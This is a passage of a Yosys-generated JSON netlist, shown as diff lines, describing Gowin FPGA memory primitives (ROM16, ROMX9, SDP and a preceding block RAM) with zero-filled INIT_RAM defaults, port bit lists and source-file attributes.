"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLK": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "OCE": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "WRE": { + "direction": "input", + "bits": [ 6 ] + }, + "AD": { + "direction": "input", + "bits": [ 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 21, 22, 23 ] + }, + "DO": { + "direction": "output", + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:269.14-269.16" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 21, 22, 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:270.13-270.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:265.12-265.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:265.7-265.10" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:271.15-271.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:266.7-266.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:267.7-267.12" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:268.7-268.10" + } + } + } + }, + "ROM16": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:189.1-193.10" + }, + "parameter_default_values": { + "INIT_0": "0000000000000000" + }, + "ports": { + "AD": { + "direction": "input", + "bits": [ 2, 3, 4, 5 ] + }, + "DO": { + "direction": "output", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:191.13-191.15" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:192.8-192.10" + } + } + } + }, + "ROMX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:275.1-351.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100100", + "BLK_SEL": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLK": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "OCE": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "WRE": { + "direction": "input", + "bits": [ 6 ] + }, + "AD": { + "direction": "input", + "bits": [ 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 21, 22, 23 ] + }, + "DO": { + "direction": "output", + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:348.14-348.16" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 21, 22, 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:349.13-349.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:344.12-344.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:344.7-344.10" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:350.15-350.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:345.7-345.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:346.7-346.12" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:347.7-347.10" + } + } + } + }, + "SDP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1438.1-1536.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000100000", + "BIT_WIDTH_1": "00000000000000000000000000100000", + "BLK_SEL": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + 